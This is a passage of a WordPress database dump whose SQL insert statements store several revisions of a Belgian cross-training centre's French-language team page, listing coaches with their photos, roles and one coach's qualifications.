style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:06:30', '2013-07-03 19:06:30', '', 20, 'http://www.crosstrainingcenter.be/?p=238', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(240, 1, '2013-07-03 19:35:31', '2013-07-03 19:35:31', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:35:31', '2013-07-03 19:35:31', '', 20, 'http://www.crosstrainingcenter.be/?p=240', 0, 'revision', '', 0),
(239, 1, '2013-07-03 19:33:18', '2013-07-03 19:33:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:33:18', '2013-07-03 19:33:18', '', 20, 'http://www.crosstrainingcenter.be/?p=239', 0, 'revision', '', 0),
(242, 1, '2013-07-03 19:38:46', '2013-07-03 19:38:46', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch\r\n\r\nBaccalauréat en éducation physique\r\nSpécialisation en psychomotricité\r\nPréparateur physique et entraineur de football diplômé de l’URBSFA\r\nEnseignant en éducation physique\r\nPratiquant de foot, triathlon, tennis et VTT</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:38:46', '2013-07-03 19:38:46', '', 20, 'http://www.crosstrainingcenter.be/?p=242', 0, 'revision', '', 0),
(243, 1, '2013-07-03 19:39:31', '2013-07-03 19:39:31', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:39:31', '2013-07-03 19:39:31', '', 20, 'http://www.crosstrainingcenter.be/?p=243', 0, 'revision', '', 0),
(244, 1, '2013-07-03 19:39:55', '2013-07-03 19:39:55', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td 